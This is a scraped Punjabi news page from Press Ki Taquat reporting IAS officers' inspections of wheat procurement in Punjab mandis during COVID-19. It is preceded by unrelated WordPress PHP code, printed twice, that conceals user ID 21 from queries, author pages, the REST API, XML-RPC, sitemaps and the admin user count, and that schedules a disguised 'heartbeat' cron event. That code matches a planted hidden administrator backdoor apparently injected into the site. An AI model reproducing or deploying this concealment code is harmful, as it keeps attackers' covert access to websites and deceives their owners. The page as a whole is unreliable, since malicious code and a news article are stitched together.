add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
ਛੇ ਆਈ.ਏ.ਐਸ. ਅਧਿਕਾਰੀਆਂ ਵੱਲੋਂ ਸੂਬਾ ਭਰ ’ਚ ਵੱਖ-ਵੱਖ ਮੰਡੀਆਂ ਦਾ ਦੌਰਾ, 30 ਅਪ੍ਰੈਲ ਨੂੰ ਸੌਂਪਣਗੇ ਰਿਪੋਰਟ - Press Ki Taquat
No Result
View All Result
ਸੂਬੇ ਦੀਆਂ ਮੰਡੀਆਂ ਵਿੱਚ ਹੁਣ ਤੱਕ 69.15 ਲੱਖ ਮੀਟਰਕ ਟਨ ਕਣਕ ਦੀ ਆਮਦ, 67.15 ਲੱਖ ਮੀਟਰਕ ਟਨ ਖਰੀਦੀ-ਵਿਸਵਾਜੀਤ ਖੰਨਾ
ਚੰਡੀਗੜ, 29 ਅਪ੍ਰੈਲ (ਪ੍ਰੈਸ ਕੀ ਤਾਕਤ ਬਿਊਰੋ) : ਕਣਕ ਦੀ ਖਰੀਦ ਦੇ ਪ੍ਰਬੰਧਾਂ ਬਾਰੇ ਕਿਸਾਨਾਂ ਅਤੇ ਆੜਤੀਆਂ ਕੋਲ ਪਹੁੰਚ ਕਰਕੇ ਫੀਡਬੈਕ ਲੈਣ ਲਈ ਛੇ ਆਈ.ਏ.ਐਸ. ਅਧਿਕਾਰੀਆਂ ਨੇ ਸੂਬੇ ਦੀਆਂ ਵੱਖ-ਵੱਖ ਮੰਡੀਆਂ ਦਾ ਦੌਰਾ ਕਰਕੇ ਜ਼ਮੀਨੀ ਸਥਿਤੀ ਦਾ ਜਾਇਜ਼ਾ ਲਿਆ ਤਾਂ ਕਿ ਫਸਲ ਦੀ ਖਰੀਦ ਅਤੇ ਲਿਫਟਿੰਗ ਦੇ ਕਾਰਜਾਂ ਵਿੱਚ ਹੋਰ ਤੇਜ਼ੀ ਲਿਆਂਦੀ ਜਾ ਸਕੇ।
ਇਹ ਪ੍ਰਗਟਾਵਾ ਕਰਦਿਆਂ ਇਕ ਸਰਕਾਰੀ ਬੁਲਾਰੇ ਨੇ ਦੱਸਿਆ ਕਿ ਇਨਾਂ ਅਧਿਕਾਰੀਆਂ ਨੂੰ ਭਲਕ (ਵੀਰਵਾਰ) ਤੱਕ ਆਪਣੀ ਰਿਪੋਰਟ ਸੌਂਪਣ ਲਈ ਆਖਿਆ ਗਿਆ ਹੈ। ਇਨਾਂ ਦੀ ਫੀਡਬੈਕ ਦੇ ਆਧਾਰ ’ਤੇ ਇਕ ਵਿਸਥਾਰਤ ਰਿਪੋਰਟ ਸੂਬਾ ਸਰਕਾਰ ਨੂੰ ਸੌਂਪੀ ਜਾਵੇਗੀ ਤਾਂ ਕਿ ਕਣਕ ਦੀ ਖਰੀਦ ਦੇ ਚੱਲ ਰਹੇ ਕਾਰਜਾਂ ਨੂੰ ਨਿਰਧਾਰਤ ਸਮੇਂ ਵਿੱਚ ਮੁਕੰਮਲ ਕੀਤਾ ਜਾ ਸਕੇ।
ਇਹ ਜ਼ਿਕਰਯੋਗ ਹੈ ਕਿ ਇਨਾਂ ਅਧਿਕਾਰੀਆਂ ਨੂੰ 28-29 ਅਪ੍ਰੈਲ ਨੂੰ ਵੱਖ-ਵੱਖ ਜ਼ਿਲਿਆਂ ਦੀਆਂ ਮੰਡੀਆਂ ਦਾ ਦੌਰਾ ਕਰਕੇ ਕਰਫਿੳੂ ਪਾਸ ਪ੍ਰਣਾਲੀ ਦੇ ਅਮਲੀਕਰਨ, ਮੰਡੀਆਂ ਵਿੱਚ ਪਿੰਡ ਵਾਰ ਕਣਕ ਦੇ ਪਹੰੁਚਣ, ਕਣਕ ਦੀ ਗੁਣਵੱਤਾ ਦਾ ਨਿਰੀਖਣ ਕਰਨ ਅਤੇ ਕੋਵਿਡ-19 ਦੇ ਪ੍ਰੋਟੋਕੋਲ ਦੀ ਪਾਲਣਾ ਨੂੰ ਯਕੀਨੀ ਬਣਾਉਣ ਦੀਆਂ ਹਦਾਇਤਾਂ ਦਿੱਤੀਆਂ ਗਈਆਂ ਸਨ।
ਇਸੇ ਦੌਰਾਨ ਵਧੀਕ ਮੁੱਖ ਸਕੱਤਰ ਵਿਕਾਸ ਵਿਸਵਾਜੀਤ ਖੰਨਾ ਜਿਨਾਂ ਨੇ 28 ਅਪ੍ਰੈਲ ਨੂੰ ਪਟਿਆਲਾ ਜ਼ਿਲੇ ਵਿੱਚ ਵੱਖ-ਵੱਖ ਮੰਡੀਆਂ ਦਾ ਦੌਰਾ ਕਰਕੇ ਖਰੀਦ ਕਾਰਜਾਂ ਤੋਂ ਇਲਾਵਾ ਸਮਾਜਿਕ ਦੂਰੀ ਸਮੇਤ ਸਿਹਤ ਪ੍ਰੋਟੋਕੋਲ ਦੀ ਪਾਲਣਾ ਸਬੰਧੀ ਜਾਇਜ਼ਾ ਲਿਆ ਸੀ, ਨੇ ਦੱਸਿਆ ਕਿ ਕੋਵਿਡ-19 ਕਾਰਨ ਮੰਡੀਆਂ ਵਿੱਚ ਕਣਕ ਦੀ ਪੜਾਅਵਾਰ ਪਹੁੰਚ ਦੇ ਬਾਵਜੂਦ ਖਰੀਦ ਕਾਰਜਾਂ ਦੀ ਸਥਿਤੀ ਤਸੱਲੀਬਖਸ਼ ਹੈ।
ਸ੍ਰੀ ਖੰਨਾ ਨੇ ਅੱਗੇ ਦੱਸਿਆ ਕਿ ਹੁਣ ਤੱਕ ਮੰਡੀਆਂ ਵਿੱਚ 69.15 ਲੱਖ ਮੀਟਰਕ ਟਨ ਕਣਕ ਪਹੁੰਚੀ ਹੈ ਜਿਸ ਵਿੱਚੋਂ 67.15 ਲੱਖ ਟਨ ਖਰੀਦੀ ਜਾ ਚੁੱਕੀ ਹੈ। ਉਨਾਂ ਦੱਸਿਆ ਕਿ ਮੰਡੀ ਬੋਰਡ ਨੇ ਮਨੋਨੀਤ 4100 ਖਰੀਦ ਕੇਂਦਰਾਂ ਲਈ ਕਿਸਾਨਾਂ ਨੂੰ ਆੜਤੀਆਂ ਰਾਹੀਂ ਹੁਣ ਤੱਕ 9.20 ਲੱਖ ਪਾਸ ਜਾਰੀ ਕੀਤੇ ਹਨ ਤਾਂ ਕਿ ਮੰਡੀਆਂ ਵਿੱਚ ਭੀੜ-ਭੱੜਕਾ ਨਾ ਹੋਵੇ। ਇਸ ਤੋਂ ਇਲਾਵਾ ਸਾਰੀਆਂ ਧਿਰਾਂ ਦੀ ਸੁਰੱਖਿਆ ਲਈ ਢੁਕਵੀਂ ਮਾਤਰਾ ਵਿੱਚ ਮਾਸਕ ਅਤੇ ਸੈਨੀਟਾਈਜ਼ਰ ਵੀ ਮੁਹੱਈਆ ਕਰਵਾਏ ਗਏ ਹਨ।
ਇਸੇ ਦੌਰਾਨ ਬੁਲਾਰੇ ਨੇ ਦੱਸਿਆ ਕਿ ਪੰਜਾਬ ਸਟੇਟ ਵੇਅਰਹਾੳੂਸਿੰਗ ਕਾਰਪੋਰੇਸ਼ਨ ਦੇ ਐਮ.ਡੀ. ਨੀਲਕੰਠ ਐਸ. ਅਵਹਾਦ ਨੇ ਰੋਪੜ ਅਤੇ ਐਸ.ਬੀ.ਐਸ. ਜ਼ਿਲਿਆਂ ਦਾ ਦੌਰਾ ਕਰਕੇ ਕਣਕ ਦੇ ਖਰੀਦ ਕਾਰਜਾਂ ਦਾ ਜਾਇਜ਼ਾ ਲਿਆ ਜਦਕਿ ਮਾਰਕਫੈੱਡ ਦੇ ਐਮ.ਡੀ. ਵਰੁਣ ਰੂਜ਼ਮ (ਅੰਮਿ੍ਰਤਸਰ ਤੇ ਤਰਨਤਾਰਨ), ਖੁਰਾਕ, ਸਿਵਲ ਸਪਲਾਈਜ਼ ਅਤੇ ਖਪਤਕਾਰ ਮਾਮਲਿਆਂ ਦੇ ਡਾਇਰੈਕਟਰ ਅਨਿੰਦਿਤਾ ਮਿੱਤਰਾ (ਐਸ.ਏ.ਐਸ. ਨਗਰ), ਸਕੱਤਰ ਮੰਡੀ ਬੋਰਡ ਰਵੀ ਭਗਤ (ਪਟਿਆਲਾ, ਐਸ.ਬੀ.ਐਸ. ਨਗਰ, ਕਪੂਰਥਲਾ, ਹੁਸ਼ਿਆਰਪੁਰ ਤੇ ਜਲੰਧਰ), ਐਮ.ਡੀ. ਪਨਸਪ ਰਾਮਬੀਰ (ਜਲੰਧਰ ਤੇ ਕਪੂਰਥਲਾ) ਅਤੇ ਐਮ.ਡੀ. ਪੰਜਾਬ ਐਗਰੋ ਫੂਡ ਕਾਰਪੋਰੇਸ਼ਨ ਮਨਜੀਤ ਬਰਾੜ (ਗੁਰਦਾਸਪੁਰ ਅਤੇ ਪਠਾਨਕੋਟ) ਦਾ ਦੌਰਾ ਕੀਤਾ।
Post Views: 322
No Result
View All Result